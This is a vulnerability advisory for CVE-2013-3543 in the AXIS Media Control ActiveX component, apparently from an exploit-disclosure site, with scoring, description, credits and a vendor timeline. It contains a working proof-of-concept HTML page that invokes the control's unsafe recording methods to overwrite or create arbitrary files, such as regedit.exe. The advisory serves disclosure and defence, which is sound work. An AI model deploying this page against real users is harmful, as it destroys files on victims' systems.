AXIS Media Control Active-X File Corruption

2013.06.14
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-618


CVSS Base Score: 8.8/10
Impact Subscore: 9.2/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Complete
Availability impact: Complete

======================================================================== AXIS ==================================================================== ======================================================================== 1.Advisory Information Title: AXIS Media Control ActiveX vulnerability Date Published: 12/06/2013 Date of last updated: 12/06/2013 2.Vulnerability Description A vulnerability has been found in this devices: -CVE-2013-3543. Exposed Unsafe ActiveX Method(CWE-618) 3.Affected Products CVE-2013-3543, all camera devices using AXIS Media Control (AMC) are affected The vulnerability affects to the latest version of the software (6.2.10.11 which was released on October 19, 2012) 4.PoC 4.1.Exposed Unsafe ActiveX Method - File Corruption. In the vendor web, you could see that AXIS Media Control is the recommended method for viewing video images in Microsoft Internet Explorer. Vulnerability which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. The vulnerability exists due to the ActiveX control including insecure "StartRecord()", "SaveCurrentImage()" and "StartRecordMedia()" methods in "AxisMediaControlEmb.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. In the following example we will corrupt regedit.exe using one of ActiveX vulnerable methods: When we click on one of the buttons, we could see that regedit.exe is overwritten with garbage: The following code could be used to test the vulnerability: _____________________________________________________________________________ <html> <head> <title></title> <script language="javaScript" type="text/javascript"> function startRecord(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; MyActiveX.StartRecord(theFile); } function saveCurrentImage(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFormat = 1; MyActiveX.SaveCurrentImage(theFormat, theFile); } function startRecordMedia(){ var theFile = "FilePath//File_name_to_corrupt_or_create"; var theFlags = 1; var theMediaTypes = "default" MyActiveX.StartRecordMedia(theFile, theFlags, theMediaTypes); } </script> </head> <body> <object id=MyActiveX classid="CLSID:{DE625294-70E6-45ED-B895-CFFA13AEB044}" style="width:640;height:480"> <param name="MediaURL" value="http://xx.xx.xx.xx/mjpg/video.mjpg"> <param name="MediaType" value="mjpeg"> <param name="Volume" value="1"> <param name="ShowStatusBar" value="1"> <param name="ShowToolbar" value="1"> <param name="AutoStart" value="1"> <param name="UIMode" value="ptz-relative"> <param name="MediaType" value="mjpeg-unicast"> <param name="StretchToFit" value="0"> < param name ='PTZControlURL' value=http://xx.xx.xx.xx/axis-cgi/com/ptz.cgi> </object> <br> <INPUT TYPE="button" VALUE="StartRecord" ONCLICK="startRecord()"> <INPUT TYPE="button" VALUE="SaveCurrentImage" ONCLICK="saveCurrentImage()"> <INPUT TYPE="button" VALUE="StartRecordMedia" ONCLICK="startRecordMedia()"> </body> </html> _____________________________________________________________________________ 5.Credits -CVE-2013-3543 was discovered by Javier Repiso Snchez. 6.Report Timeline -2013-05-24: Students team notifies the Axis Customer Support of the vulnerability -2013-05-24: Axis team asks for a report with technical information. -2013-05-26: Technical details sent to Axis. -2013-05-27: Axis team reports to the technical support to analyze the vulnerability.

References:

https://cxsecurity.com/issue/WLB-2013010111


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top